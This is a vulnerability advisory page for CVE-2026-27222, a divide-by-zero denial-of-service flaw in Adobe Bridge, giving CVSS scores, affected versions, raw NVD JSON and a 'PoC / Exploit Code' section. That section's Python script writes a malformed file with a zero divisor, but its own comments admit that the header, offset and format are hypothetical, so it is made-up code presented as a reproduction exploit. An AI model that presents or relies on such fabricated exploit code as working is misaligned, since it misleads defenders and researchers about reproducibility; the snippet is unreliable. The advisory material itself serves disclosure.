Security Vulnerability Report
中文
CVE-2026-27222 CVSS 5.5 MEDIUM

CVE-2026-27222

Published: 2026-04-14 20:16:33
Last Modified: 2026-04-15 19:59:51

Description

Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Divide By Zero vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application or render it unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Bridge <= 16.0.2
Adobe Bridge <= 15.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-27222 (Adobe Bridge Divide By Zero) # This script generates a malformed file to trigger the crash. # Note: The specific file format and bytes are hypothetical based on the vulnerability type. import struct def generate_malicious_file(filename): # Simulating a file header that Adobe Bridge parses # Assuming a specific field at offset 0x10 is used as a divisor header = b'MAGIC_HEADER' + b'\x00' * 8 # Malicious payload: Setting the divisor to 0x00000000 # Offset 0x10 (hypothetical) malicious_divisor = struct.pack('<I', 0) rest_of_file = b'\x00' * 100 with open(filename, 'wb') as f: f.write(header) f.write(malicious_divisor) f.write(rest_of_file) print(f"Malicious file generated: {filename}") print("Open this file in Adobe Bridge <= 16.0.2 to reproduce the DoS.") if __name__ == "__main__": generate_malicious_file("crash_test_file")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27222", "sourceIdentifier": "[email protected]", "published": "2026-04-14T20:16:32.927", "lastModified": "2026-04-15T19:59:51.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Divide By Zero vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application or render it unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-369"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1.5", "matchCriteriaId": "8B4FBE0D-49AE-47B0-9A02-CF772B606C89"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0", "versionEndExcluding": "16.0.3", "matchCriteriaId": "AA94FD4C-CD52-43BC-9DD6-C688A783A5F9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/bridge/apsb26-39.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}